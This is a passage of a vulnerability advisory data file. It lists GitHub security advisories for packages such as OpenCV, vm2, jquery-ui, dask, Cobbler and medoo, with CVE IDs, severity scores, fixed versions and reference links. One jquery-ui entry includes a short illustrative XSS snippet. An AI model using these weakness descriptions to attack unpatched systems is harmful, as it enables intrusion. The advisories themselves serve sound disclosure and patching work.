'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40865'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8d45e74299897b6734dd0f788c46a631009ce2eeb731523386f7a253%40%3Cuser.storm.apache.org%3E'}, {'type': 'WEB', 'url': 'https://seclists.org/oss-sec/2021/q4/45'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-26T17:53:48Z', 'nvd_published_at': '2021-10-25T13:15:00Z'}"
+1.4.0,GHSA-634c-v2xv-ffpg,2021-10-07T20:28:55Z,2021-10-12T22:02:51Z,,['CVE-2017-14136'],Out-of-bounds Write in OpenCV,OpenCV (Open Source Computer Vision Library) 3.3 (corresponding to OpenCV-Python 3.3.0.9) has an out-of-bounds write error in the function FillColorRow1 in utils.cpp when reading an image file by using cv::imread. NOTE: this vulnerability exists because of an incomplete fix for CVE-2017-12597.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-14136'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9443'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9448'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:28:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9g3v-j3cr-6fc6,2021-10-25T20:08:05Z,2021-10-21T17:48:26Z,,['CVE-2021-3879'],Cross-site Scripting in snipe-it,snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3879'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/bda23bb1e66fd7ce42c75c69cf5eea4e80865c1c'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6dccc49e-3843-4a4a-b397-5c659e5f8bfe'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T15:51:59Z', 'nvd_published_at': '2021-10-19T13:15:00Z'}"
+1.4.0,GHSA-9g8h-pjm4-q92p,2021-11-18T15:31:47Z,2021-10-12T22:23:41Z,,['CVE-2018-5268'],Out-of-bounds Write in OpenCV.,"In OpenCV 3.3.1 (corresponding with OpenCV-Python 3.3.1.11), a heap-based buffer overflow happens in cv::Jpeg2KDecoder::readComponent8u in modules/imgcodecs/src/grfmt_jpeg2000.cpp when parsing a crafted image file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-5268'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/10541'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/10566/commits/435a3e337bd9d4e11af61cf8b8afca067bf1a8aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/04/msg00019.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/106945'}]","{'cwe_ids': ['CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T19:55:52Z', 'nvd_published_at': '2018-01-08T05:29:00Z'}"
+1.4.0,GHSA-rjf2-j2r6-q8gr,2021-10-19T14:18:05Z,2021-10-19T15:28:45Z,,['CVE-2021-23449'],Prototype Pollution in vm2,This affects the package vm2 before 3.9.4. Prototype Pollution attack vector can lead to sandbox escape and execution of arbitrary code on the host machine.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'vm2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23449'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/issues/363'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886'}, {'type': 'PACKAGE', 'url': 'https://github.com/patriksimek/vm2'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/releases/tag/3.9.4'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211029-0010/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-VM2-1585918'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T14:18:05Z', 'nvd_published_at': '2021-10-18T17:15:00Z'}"
+1.4.0,GHSA-cpqf-3c3r-c9g2,2021-10-05T15:57:32Z,2021-10-05T17:53:20Z,,['CVE-2021-40323'],Cobbler before 3.3.0 allows log poisoning,"Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'cobbler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40323'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a'}, {'type': 'PACKAGE', 'url': 'https://github.com/cobbler/cobbler'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/releases/tag/v3.3.0'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T15:57:32Z', 'nvd_published_at': '2021-10-04T06:15:00Z'}"
+1.4.0,GHSA-9gj3-hwp5-pmwc,2021-10-27T17:00:10Z,2021-10-26T14:55:02Z,,['CVE-2021-41182'],XSS in the `altField` option of the Datepicker widget in jquery-ui,"### Impact
+Accepting the value of the `altField` option of the Datepicker widget from untrusted sources may execute untrusted code. For example, initializing the datepicker in the following way:
+```js
+$( ""#datepicker"" ).datepicker( {
+ altField: ""
"",
+} );
+```
+will call the `doEvilThing` function.
+
+### Patches
+The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `altField` option is now treated as a CSS selector.
+
+### Workarounds
+A workaround is to not accept the value of the `altField` option from untrusted sources.
+
+### For more information
+If you have any questions or comments about this advisory, search for a relevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues). If you don't find an answer, open a new issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery.UI.Combined'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-ui-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/security/advisories/GHSA-9gj3-hwp5-pmwc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41182'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/pull/1954/commits/6809ce843e5ac4128108ea4c15cbc100653c2b63'}, {'type': 'WEB', 'url': 'https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery-ui'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-ui-rails/CVE-2021-41182.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211118-0004/'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-contrib-2022-004'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2022-002'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2022-09'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T22:06:41Z', 'nvd_published_at': '2021-10-26T15:15:00Z'}"
+1.4.0,GHSA-5rg2-6qr5-2xp8,2021-10-25T20:08:18Z,2021-10-21T17:49:18Z,,['CVE-2021-3863'],Cross-site Scripting in snipe-it,snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3863'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/fc5efd857f61f7e45c61db567bb66612bcb53128'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/releases/tag/v5.3.0'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1dbc8d79-1b53-44a3-a576-faec78f29ba0'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T16:52:33Z', 'nvd_published_at': '2021-10-19T13:15:00Z'}"
+1.4.0,GHSA-jggw-2q6g-c3m6,2021-10-06T18:06:55Z,2021-10-12T22:22:58Z,,['CVE-2019-19624'],Out-of-bounds Read in OpenCV,"An out-of-bounds read was discovered in OpenCV before 4.1.1 (OpenCV-Python before 4.1.0.25). Specifically, variable coarsest_scale is assumed to be greater than or equal to finest_scale within the calc()/ocl_calc() functions in dis_flow.cpp. However, this is not true when dealing with small images, leading to an out-of-bounds read of the heap-allocated arrays Ux and Uy.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.24'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.24'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.24'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.24'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19624'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/14554'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/commit/d1615ba11a93062b1429fce9f0f638d1572d3418'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2019-19624'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/25'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T18:06:55Z', 'nvd_published_at': '2019-12-06T15:15:00Z'}"
+1.4.0,GHSA-j8fq-86c5-5v2r,2022-03-21T19:58:43Z,2021-10-27T18:53:48Z,,['CVE-2021-42343'],Remote code execution in dask,An issue was discovered in Dask (aka python-dask) through 2021.09.1. Single machine Dask clusters started with dask.distributed.LocalCluster or dask.distributed.Client (which defaults to using LocalCluster) would mistakenly configure their respective Dask workers to listen on external interfaces (typically with a randomly selected high port) rather than only on localhost. A Dask cluster created using this method (when running on a machine that has an applicable port exposed) could be used by a sophisticated attacker to achieve remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'distributed'}, 'ecosystem_specific': {'affected_functions': ['dask.distributed.LocalCluster', 'dask.distributed.Client']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2021.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dask/distributed/security/advisories/GHSA-hwqr-f3v9-hwxr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42343'}, {'type': 'WEB', 'url': 'https://github.com/dask/distributed/pull/5427'}, {'type': 'WEB', 'url': 'https://github.com/dask/distributed/commit/afce4be8e05fb180e50a9d9e38465f1a82295e1b'}, {'type': 'WEB', 'url': 'https://docs.dask.org/en/latest/changelog.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/dask/distributed'}]","{'cwe_ids': ['CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-27T18:16:11Z', 'nvd_published_at': '2021-10-26T11:15:00Z'}"
+1.4.0,GHSA-rqxg-xvcq-3v2f,2021-11-18T15:33:23Z,2021-10-12T22:02:04Z,,['CVE-2017-12605'],Out-of-bounds Write in OpenCV,OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an out-of-bounds write error in the FillColorRow8 function in utils.cpp when reading an image file by using cv::imread.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12605'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:53:47Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}"
+1.4.0,GHSA-m836-gxwq-j2pm,2021-10-27T18:58:30Z,2021-10-28T16:27:03Z,,[],Improper Access Control in github.com/treeverse/lakefs,"### Impact
+
+1. [medium] A user with write permissions to a portion of a repository may use the S3 gateway to copy any object in the repository if they know its name.
+1. [medium] A user with permission to write any one of tags, branches, or commits on a repository may write all of them.
+1. [low] A user with permission to read any one of tags, branches, or commits on a repository may read all of them.
+1. [low] A user allowed to list objects in a repository _or_ read repository meta-data may retrieve graveler information about the location on underlying storage of all objects stored in any commit that they can view. If the user additionally has the capability to read underlying storage, they will be able to retrieve metadata associated with all objects in that commit.
+
+### For more information
+
+If you have any questions or comments about this advisory please:
+* Email us at security@treeverse.io.
+* Open an issue on https://github.com/treeverse/lakeFS/issues/new.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/treeverse/lakefs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.53.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/treeverse/lakeFS/security/advisories/GHSA-m836-gxwq-j2pm'}, {'type': 'WEB', 'url': 'https://github.com/treeverse/lakeFS/commit/f2117281cadb14fdf9ac7fe287f84d5c10308b88'}, {'type': 'PACKAGE', 'url': 'https://github.com/treeverse/lakeFS'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-27T18:58:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4mvj-rq4v-2fxw,2022-12-03T03:56:39Z,2021-10-21T17:50:44Z,,['CVE-2021-23452'],Prototype Pollution in x-assign,This vulnerability affects all versions of package x-assign. The global proto object can be polluted using the __proto__ object.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'x-assign'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23452'}, {'type': 'PACKAGE', 'url': 'https://github.com/mvoorberg/x-assign'}, {'type': 'WEB', 'url': 'https://runkit.com/embed/sq8qjwemyn8t'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-XASSIGN-1759314'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-21T14:54:57Z', 'nvd_published_at': '2021-10-20T13:15:00Z'}"
+1.4.0,GHSA-9cxh-gqpx-qc5m,2022-02-08T20:42:44Z,2021-10-12T17:49:25Z,,['CVE-2021-41355'],Credential Disclosure in System.DirectoryServices.Protocols,"Microsoft is releasing this security advisory to provide information about a vulnerability in .NET. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
+
+A Information Disclosure vulnerability exists in .NET where System.DirectoryServices.Protocols.LdapConnection may send credentials in plain text on Linux.
+
+### Patches
+Any .NET application that uses `System.DirectoryServices.Protocols` with a vulnerable version listed below on system based on Linux.
+
+Package name | Vulnerable versions | Secure versions
+------------ | ---------------- | -------------------------
+System.DirectoryServices.Protocols | 5.0.0 | 5.0.1
+
+### Other Details
+
+- Announcement for this issue can be found at dotnet/announcements#202
+- An Issue for this can be found at https://github.com/dotnet/runtime/issues/60301
+- MSRC details for this can be found at https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41355","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'System.DirectoryServices.Protocols'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-9cxh-gqpx-qc5m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41355'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/issues/60301'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41355'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41355'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T17:48:55Z', 'nvd_published_at': '2021-10-13T01:15:00Z'}"
+1.4.0,GHSA-q9p4-qfc8-fvpp,2021-10-08T23:09:47Z,2021-10-12T16:32:38Z,,['CVE-2019-10762'],SQL Injection in medoo,columnQuote in medoo before 1.7.5 allows remote attackers to perform a SQL Injection due to improper escaping.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'catfan/medoo'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10762'}, {'type': 'WEB', 'url': 'https://github.com/catfan/Medoo/commit/659864b393961bf224bba1efc03b7dcbed7de533'}, {'type': 'PACKAGE', 'url': 'https://github.com/catfan/Medoo'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PHP-CATFANMEDOO-474562'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T23:09:47Z', 'nvd_published_at': '2019-10-30T22:15:00Z'}"
+1.4.0,GHSA-9378-f4v7-jgm4,2021-10-08T21:29:34Z,2021-10-04T20:12:30Z,,['CVE-2021-41616'],Deserialization of Untrusted Data in org.apache.ddlutils:ddlutils,"Apache DB DdlUtils 1.0 included a BinaryObjectsHelper that was intended for use when migrating database data with a SQL data type of BINARY, VARBINARY, LONGVARBINARY, or BLOB between databases using the ddlutils features. The BinaryObjectsHelper class was insecure and used ObjectInputStream.readObject without validating that the input data was safe to deserialize. Please note that DdlUtils is no longer being actively developed. To address the insecurity of the BinaryObjectHelper class, the following changes to DdlUtils have been made: (1) BinaryObjectsHelper.java has been deleted from the DdlUtils source repository and the DdlUtils feature of propagating data of SQL binary types is therefore no longer present in DdlUtils; (2) The ddlutils-1.0 release has been removed from the Apache Release Distribution Infrastructure; (3) The DdlUtils web site has been updated to indicate that DdlUtils is now available only as source code, not as a packaged release.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ddlutils:ddlutils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41616'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/ddlutils'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3d7a8303a820144f5e2d1fd0b067e18d419421b58346b53b58d3fa72%40%3Cannounce.apache.org%3E'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-01T18:36:23Z', 'nvd_published_at': '2021-09-30T08:15:00Z'}"
+1.4.0,GHSA-x3rm-644h-67m8,2021-10-06T20:21:31Z,2021-10-12T22:22:05Z,,['CVE-2019-16249'],Out-of-bounds Read in OpenCV,OpenCV 4.1.1 has an out-of-bounds read in hal_baseline::v_load in core/hal/intrin_sse.hpp when called from computeSSDMeanNorm in modules/video/src/dis_flow.cpp.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.2.30'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.1.26'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.2.30'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.1.26'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.2.30'}]}], 'database_specific': {'last_known_affected_version_range': 